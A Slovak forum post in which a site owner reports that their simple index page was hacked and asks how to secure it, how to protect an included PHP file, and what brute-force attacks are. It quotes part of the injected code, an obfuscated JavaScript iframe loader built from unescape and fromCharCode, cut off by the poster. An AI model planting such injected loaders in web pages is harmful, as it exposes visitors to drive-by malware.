Nazdarek. Chcem sa opytat na par veci.
1. Mam spravenu indexovu stranku, na ktorej nie je vôbec nic, iba nazov stranky..cize ziadny odkaz, ziadny formular..nic. V jednoduchost asi toto:
Kód:
<html>
<body color: black>
<span style=' font-size: 24px; font-weight: bold; font-family: Tahoma, Verdana, Arial; color: green '>www.nazov stranky.sk</span>
</body>
</html>
Nic viac.. Ako je mozne ze mi to hackli...Teda, pri nacitavani mi vypise, ze taha data z nejakej stranky tusim
imprerator.ru. A po nacitani sa mi zapne nacitavanie Acrobat Readeru, no skor ako ukonci nacitanie Acrobatu,tak mi vyhodi nejake varovne okienko. Ked som si pozrel zdrojovy kod tej stranky, tak som tam na moje prekvapenie nasiel nieco take:
Kód:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>www.nazovstranky.sk</title>
<meta http-equiv="content-type" content="text/html; charset=windows-1250" >
<meta http-equiv="content-language" content="en" >
<meta name="description" content="Only4Web.com" >
<meta name="robots" content="all,follow" >
</head>
<body bottomMargin="0" bgcolor="black" leftMargin="0" topMargin="220" marginheight="0"
marginwidth="0" text-align="center"><!-- ad --><SCRIPT TYPE="text/javascript" LANGUAGE="JavaScript1.2">document.write(unescape('')+String.fromCharCode(60)+String.fromCharCode(105)+''+'fr'+unescape('%61%6D')+'e'+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+''+unescape('%3D%22%62')+String.fromCharCode(53)+String.fromCharCode(51)+String.fromCharCode(55)+''+unescape('%65%38%37%66')+unescape('%31%64%62')+'fafe'+unescape('%66%62')+unescape('%38%62%62%37')+...pokracuje to dalej..
Ako to mam osetrit, aby mi to nehackli???
2. Ako mam osetrit subor, ktory je includovany v index.php?? Mam teraz na mysli subor v ktorom mam ulozene len funkcie s nazvom napr. funkcie.php . V subore index.php ho mam zapisany takto:
Kód:
require "./funkcie.php";
Je nutne takyto subor vobec nejako este osetrovat proti nejakemu "vniknutiu", alebo je to zbytocne?? Ako to mate osetrene vy??
3. Par krat som sa uz na tomto fore stretol s vyrazom "brute force". S prispevkov som pochopil ze sa jedna o utok na DB, ale zaujimalo by ma to trocha viac. Cize o co presne go a ako sa predtym chranit?? Nevysvetlili by ste mi to niekto alebo hodili by ste mi nejaky link??
Viem ze je tu uz na nieco podobne tema .. myslim to bola :
Ochrana PHP skriptov a vy , ale nejako som v tom nenasiel konkretne odpovede na moje otazky.. Mozno tam aj su, len som to asi nepochopil.